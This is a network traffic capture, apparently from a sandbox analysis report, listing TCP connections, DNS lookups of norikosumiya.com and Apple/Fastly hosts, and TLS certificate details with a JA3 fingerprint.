                                                                      Jan 19, 2025 20:31:52.240008116 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240272045 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240417957 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240473032 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240612030 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240700960 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.240833044 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241168976 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241658926 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.241887093 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.242264986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.467607975 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.467616081 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.467773914 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.470829964 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.470848083 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.471035957 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471127987 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471142054 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.471385002 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471661091 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471751928 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471960068 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.471972942 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472167969 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472179890 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472269058 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472281933 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472464085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472477913 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.472570896 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472675085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472826004 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.472834110 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473026991 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473026991 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473037004 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473123074 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473371983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473463058 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473469019 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.473592997 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473696947 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473881006 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473968983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.473972082 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474102020 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474268913 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474349022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474492073 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474553108 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474714041 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474803925 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474803925 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474812031 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.474850893 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.474900007 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475011110 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475011110 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475059986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475059986 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475158930 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.475162029 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.475977898 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476181984 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476274014 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476403952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476403952 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476650000 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476742029 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476831913 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.476974964 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.477355003 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.477771044 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.478251934 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.478630066 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487258911 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487612963 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.487972021 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.488301992 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.512120008 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.512140989 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.515966892 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516222954 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516485929 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516577005 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516720057 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.516731977 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.516927958 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517226934 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517518997 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.517597914 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.518104076 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.701209068 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.701292038 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702428102 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702496052 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.702708960 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703732014 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.703793049 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703808069 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:31:52.703820944 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.703964949 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704005957 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704174042 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704174042 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704221010 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704370022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704370022 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704513073 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704514027 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704514027 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704662085 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.704782009 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.705641985 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708168983 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708479881 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.708790064 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.709112883 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.710541010 CET49356443192.168.11.1281.19.135.228
                                                                      Jan 19, 2025 20:31:52.710648060 CET4434935681.19.135.228192.168.11.12
                                                                      Jan 19, 2025 20:32:15.213443041 CET4934580192.168.11.1223.55.204.208
                                                                      Jan 19, 2025 20:32:15.363863945 CET804934523.55.204.208192.168.11.12
                                                                      Jan 19, 2025 20:32:15.657048941 CET804934523.55.204.208192.168.11.12
                                                                      Jan 19, 2025 20:32:15.659449100 CET4934580192.168.11.1223.55.204.208
                                                                      Jan 19, 2025 20:32:25.009325027 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.009438038 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.010039091 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.011159897 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.011214018 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.273164034 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.275151014 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.275219917 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.413177967 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.413407087 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.413875103 CET44349388151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.414156914 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.414433956 CET49388443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.468009949 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.468051910 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.468589067 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.469393969 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.469407082 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.705360889 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.706507921 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.706674099 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.714867115 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.714993954 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.715205908 CET44349389151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:25.715823889 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:25.715823889 CET49389443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.753449917 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.753521919 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:26.754228115 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.756608009 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:26.756644964 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.004534006 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.005880117 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.005959034 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.011997938 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.012229919 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.012748003 CET44349395151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:27.012864113 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:27.013396025 CET49395443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.008294106 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.008394003 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.009052992 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.010006905 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.010059118 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.254182100 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.256105900 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.256105900 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.262253046 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.262480021 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.262990952 CET44349396151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.263073921 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.263897896 CET49396443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.274785995 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.274898052 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.275623083 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.276278973 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.276364088 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.517435074 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.519543886 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.519543886 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.525424957 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.525535107 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.525687933 CET44349397151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.526192904 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.526376009 CET49397443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.543122053 CET49398443192.168.11.12151.101.131.6
                                                                      Jan 19, 2025 20:32:44.543165922 CET44349398151.101.131.6192.168.11.12
                                                                      Jan 19, 2025 20:32:44.543898106 CET49398443192.168.11.12151.101.131.6
Jan 19, 2025 20:32:44.544661999 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.544697046 CET | 443 | 49398 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:44.789264917 CET | 443 | 49398 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:44.791251898 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.791251898 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.799494982 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.799741983 CET | 443 | 49398 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:44.800203085 CET | 443 | 49398 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:44.800621986 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.800677061 CET | 49398 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.811532021 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.811645985 CET | 443 | 49399 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:44.812309027 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.813052893 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:44.813141108 CET | 443 | 49399 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:45.062458038 CET | 443 | 49399 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:45.064404964 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:45.064487934 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:45.071005106 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:45.071250916 CET | 443 | 49399 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:45.071717978 CET | 443 | 49399 | 151.101.131.6 | 192.168.11.12
Jan 19, 2025 20:32:45.071816921 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:32:45.072343111 CET | 49399 | 443 | 192.168.11.12 | 151.101.131.6
Jan 19, 2025 20:33:28.982016087 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:28.982130051 CET | 443 | 49400 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:28.982774019 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:28.983536959 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:28.983619928 CET | 443 | 49400 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.213962078 CET | 443 | 49400 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.216068029 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.216377020 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.222348928 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.222476959 CET | 443 | 49400 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.222696066 CET | 443 | 49400 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.223253965 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.223366022 CET | 49400 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.244096994 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.244151115 CET | 443 | 49401 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.244879007 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.245517969 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.245558977 CET | 443 | 49401 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.475259066 CET | 443 | 49401 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.477319956 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.477319956 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.483697891 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.483809948 CET | 443 | 49401 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.483962059 CET | 443 | 49401 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.484563112 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.484563112 CET | 49401 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.499954939 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.499998093 CET | 443 | 49402 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.500719070 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.501461029 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.501493931 CET | 443 | 49402 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.727523088 CET | 443 | 49402 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.729396105 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.729417086 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.739401102 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.739522934 CET | 443 | 49402 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.739706993 CET | 443 | 49402 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.740216017 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.740269899 CET | 49402 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.752592087 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.752645016 CET | 443 | 49403 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.753401995 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.754043102 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.754065037 CET | 443 | 49403 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.987274885 CET | 443 | 49403 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.988157988 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.988158941 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.996423006 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.996666908 CET | 443 | 49403 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.997160912 CET | 443 | 49403 | 151.101.67.6 | 192.168.11.12
Jan 19, 2025 20:33:29.997270107 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6
Jan 19, 2025 20:33:29.997980118 CET | 49403 | 443 | 192.168.11.12 | 151.101.67.6

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 19, 2025 20:31:50.537225962 CET | 54354 | 53 | 192.168.11.12 | 1.1.1.1
Jan 19, 2025 20:31:50.668982983 CET | 53 | 54354 | 1.1.1.1 | 192.168.11.12
Jan 19, 2025 20:32:10.322436094 CET | 53 | 59261 | 1.1.1.1 | 192.168.11.12
Jan 19, 2025 20:33:28.842664957 CET | 55512 | 53 | 192.168.11.12 | 1.1.1.1
Jan 19, 2025 20:33:28.979610920 CET | 53 | 55512 | 1.1.1.1 | 192.168.11.12

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 19, 2025 20:31:50.537225962 CET | 192.168.11.12 | 1.1.1.1 | 0xcf7c | Standard query (0) | norikosumiya.com | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:33:28.842664957 CET | 192.168.11.12 | 1.1.1.1 | 0xc4de | Standard query (0) | h3.apis.apple.map.fastly.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 19, 2025 20:31:46.820705891 CET | 1.1.1.1 | 192.168.11.12 | 0x91f7 | No error (0) | gateway.fe2.apple-dns.net |  | 17.248.228.69 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:31:46.820705891 CET | 1.1.1.1 | 192.168.11.12 | 0x91f7 | No error (0) | gateway.fe2.apple-dns.net |  | 17.248.228.71 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:31:46.820705891 CET | 1.1.1.1 | 192.168.11.12 | 0x91f7 | No error (0) | gateway.fe2.apple-dns.net |  | 17.248.228.70 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:31:46.820705891 CET | 1.1.1.1 | 192.168.11.12 | 0x91f7 | No error (0) | gateway.fe2.apple-dns.net |  | 17.248.228.66 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:31:50.668982983 CET | 1.1.1.1 | 192.168.11.12 | 0xcf7c | No error (0) | norikosumiya.com |  | 81.19.135.228 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:33:28.979610920 CET | 1.1.1.1 | 192.168.11.12 | 0xc4de | No error (0) | h3.apis.apple.map.fastly.net |  | 151.101.3.6 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:33:28.979610920 CET | 1.1.1.1 | 192.168.11.12 | 0xc4de | No error (0) | h3.apis.apple.map.fastly.net |  | 151.101.67.6 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:33:28.979610920 CET | 1.1.1.1 | 192.168.11.12 | 0xc4de | No error (0) | h3.apis.apple.map.fastly.net |  | 151.101.195.6 | A (IP address) | IN (0x0001) | false
Jan 19, 2025 20:33:28.979610920 CET | 1.1.1.1 | 192.168.11.12 | 0xc4de | No error (0) | h3.apis.apple.map.fastly.net |  | 151.101.131.6 | A (IP address) | IN (0x0001) | false

                                                                      • norikosumiya.com
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jan 19, 2025 20:31:46.745444059 CET | 151.101.3.6 | 443 | 192.168.11.12 | 49349 | CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization | CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | Wed Nov 13 17:31:50 CET 2024 | Wed Mar 12 20:42:08 CET 2025 |  | 
  (chain) CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US | CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US | Wed Apr 29 14:54:50 CEST 2020 | Thu Apr 11 01:59:59 CEST 2030
Jan 19, 2025 20:31:47.051085949 CET | 17.248.228.69 | 443 | 192.168.11.12 | 49350 | CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US | CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US | Mon Oct 28 07:43:49 CET 2024 | Tue Nov 18 21:36:07 CET 2025 | 771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0 | 5c118da645babe52f060d0754256a73c
  (chain) CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US | CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US | Wed Dec 12 13:00:00 CET 2018 | Wed Dec 11 13:00:00 CET 2030
